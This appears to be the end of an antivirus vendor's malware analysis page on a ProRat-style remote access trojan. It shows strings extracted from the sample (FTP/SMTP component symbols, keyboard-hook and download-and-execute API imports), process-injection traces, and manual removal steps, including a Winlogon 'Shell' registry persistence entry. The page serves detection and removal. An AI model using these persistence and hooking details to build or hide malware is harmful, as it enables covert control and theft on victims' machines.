@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
KeyPreview
220 Welcom to ProRat_Ftp_Server.
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc

services.exe_1276_rwx_01401000_00005000:




CBv.SCv
RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll
C:\Windows\services.exe
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll

Explorer.EXE_2024_rwx_10001000_00001000:




CBv.SCv
RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll

Explorer.EXE_2024_rwx_10004000_00002000:




C:\Windows\Explorer.EXE
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll

conhost.exe_3700_rwx_10001000_00001000:




CBv.SCv
RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll

conhost.exe_3700_rwx_10004000_00002000:




C:\Windows\system32\conhost.exe
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    fservice.exe:1476
    5141.exe:288
    %original file name%.exe:3624
    

    2. 

  2. Delete the original AIT file.
    3. 

  3. Delete or disinfect the following files created/modified by the AIT:
    

    C:\Windows\services.exe (2457 bytes)
    C:\Windows\system\sservice.exe (2105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\5141\5141.exe.bat (135 bytes)
    C:\Windows\System32\fservice.exe (2457 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jbvpkqi (10089 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\autA852.tmp (5393 bytes)
    

    4. 

  4. Remove the references to the AIT by modifying the following registry value(s) (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2024 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now